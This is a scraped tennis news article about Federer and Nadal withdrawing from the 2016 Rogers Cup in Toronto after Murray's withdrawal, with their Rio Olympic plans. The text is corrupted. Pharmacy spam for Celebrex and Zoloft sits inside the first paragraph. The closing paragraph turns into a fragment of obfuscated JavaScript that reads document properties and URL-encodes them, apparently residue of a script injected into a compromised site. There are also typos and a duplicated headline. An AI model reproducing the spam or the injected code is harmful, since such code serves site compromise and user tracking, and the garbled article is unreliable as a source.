Skip to content Skip to footer

Former champions Roger Federer and Rafa Nadal walked out of the Rogers Cup in Toronto. Thus the tournament is left without three of the world’s top four players, as said by Tennis Canada. buy celebrex online cheap, buy Zoloft.
The decision by Swiss world number three Federer and Spanish world number four Nadal come a day after Wimbledon winner Andy Murray, ranked second, said he would not defend his Rogers Cup title so that he can rest before defending his Olympic singles crown in Rio.

Federer, Nadal Walk Out Of Toronto Event
Federer, Nadal Walk Out Of Toronto Event

Federer is a 17-times grand slam champion and the Canadian stop in 2004 and 2006 was won by him. He said that more time was needed by him after his bid for a record-extending 18th grand slam title ended in the Wimbledon semi-finals earlier this month.

“Looking ahead, it is best for me that I take more time after Wimbledon,” the 34-year-old Federer, who will look forward to Ahis third Olympic medal at next month’s Rio Games, said in a statement. “I look forward to coming back to Canada next year,” he added.

Nadal had been out of action since walking out of the French Open, due to a wrist injury. He said that he was not fit enough to resume to competition.

Despite not fulfilling the qualification criteria, the 30-year-old Spaniard was currently given clearance to compete in Rio. He has been a three-time winner of the Rogers Cup tournament. “I only started practicing a week ago after my wrist injury and I am not ready to play such an important event,” said Nadal.

The Rogers Cup will run from July 23-31, where Novak Djokovic is in top form. And the tennis competition at the Rio Olympics will be held from August 6-14. (document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Leave a comment

0/100